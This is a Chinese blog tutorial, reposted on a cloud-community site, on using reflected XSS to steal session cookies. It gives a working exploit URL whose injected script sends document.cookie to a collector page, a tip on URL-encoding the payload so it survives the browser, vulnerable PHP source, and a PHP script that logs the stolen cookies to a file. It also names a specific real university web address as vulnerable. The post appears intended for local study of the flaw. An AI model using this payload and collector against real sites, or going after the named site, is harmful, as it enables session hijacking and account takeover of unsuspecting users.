前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >反射型xss偷取cookie(本地验证)

反射型xss偷取cookie(本地验证)

作者头像
全栈程序员站长
发布2022-08-25 16:35:25
3800
发布2022-08-25 16:35:25
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

原理

反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。

本地验证

xss漏洞地址:http://localhost/njuptsta/xss/reflect_xss.php?name=1 黑客收集cookie地址:http://localhost/1.php?c= 构造的url exploit :

值得注意的一点:

shellcode里面cookie和原始url连接的时候,用的是+。 然而在浏览器的地址栏里,+可能被解析成空格。 所以我们需要把+替换成url编码%2b。 这一点值得注意,花了两个晚上最后还是求助的别人才发现的。 —2015年11月16号更新。

代码语言:javascript
复制
http://localhost/njuptsta/xss/reflect_xss.php?name=1<script>document.location="http://localhost/1.php?c="%2bdocument.cookie</script>
源码:反射型xss漏洞

将用户输入显示在当前页面,存在反射型xss漏洞。

代码语言:javascript
复制
<html>
<body>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<form method = "get" action = "reflect_xss.php">
反射型xss<br>
<input type = "text" name = "name"><br>
<input type = "submit">
</form>
<?php echo $_GET['name']; ?>
</body>
</html>
源码:黑客收集cookie
代码语言:javascript
复制
<?php $cookie = $_GET['c']; $myfile = fopen("testfile.txt", "a"); fwrite($myfile, "cookie:".$cookie."\n"); fclose($myfile); ?>
反射型xss漏洞存在地址:

http://jwc.shcmusic.edu.cn/plus/Search.asp?searchtype=1&channelid=1&KeyWord=123

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/142952.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年5月1,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 原理
  • 本地验证
  • 值得注意的一点:
    • 源码:反射型xss漏洞
      • 源码:黑客收集cookie
        • 反射型xss漏洞存在地址:
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档